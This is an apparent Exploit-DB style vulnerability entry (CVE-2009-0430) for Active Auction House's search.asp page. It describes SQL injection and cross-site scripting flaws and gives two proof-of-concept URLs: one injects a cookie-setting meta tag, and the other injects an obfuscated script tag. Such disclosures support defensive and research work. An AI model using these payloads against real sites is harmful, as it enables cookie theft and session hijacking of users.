Active Bids - 'search' Cross-Site Scripting

Author: Pouya_Server
type: webapps
platform: asp
port: 
date_added: 2009-01-15
date_updated: 2017-01-04
verified: 1
codes: CVE-2009-0430;OSVDB-51764
tags: 
aliases: 
screenshot_url: 
application_url: 

source: https://www.securityfocus.com/bid/33306/info


Active Auction House and Active Auction Pro are prone to SQL-injection and cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/[Path]/search.asp?search=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&submit=%3E

http://www.example.com/[Path]/search.asp?search=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&submit=%3E
↑